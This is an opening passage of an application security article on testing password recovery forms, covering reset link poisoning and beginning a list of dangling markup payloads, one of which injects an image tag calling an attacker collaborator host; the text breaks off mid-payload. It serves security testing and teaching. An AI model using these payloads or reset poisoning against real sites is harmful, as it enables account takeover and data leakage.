AppSec Tales III | Password Recovery

Application Security Testing of the Password Recovery form guidelines.

INTRODUCTION

The article describes the Application Security Testing of the Password Recovery forms to ensure a secure authentication process.
The advice in this article is based on:

• OWASP Web Security Testing Guide
• OWASP Application Security Verification Standard
• NIST recommendations
• bug bounty reports
• own experience.

I will provide a short test sample, a potential impact or an attack scenario, and a possible solution to the problem at each point.

GUIDELINES

I. PASSWORD RECOVERY LINK POISONING

Poison the domain part of the password recovery link.

• It could allow the attacker to hijack the victim user's account who clicked on the poisoned password recovery link.

Source: Own study — The testing flow of password reset poisoning (fuzzing wordlist).

DANGLING MARKUPS PAYLOADS

"><img src='//domain_collab? 
"><img…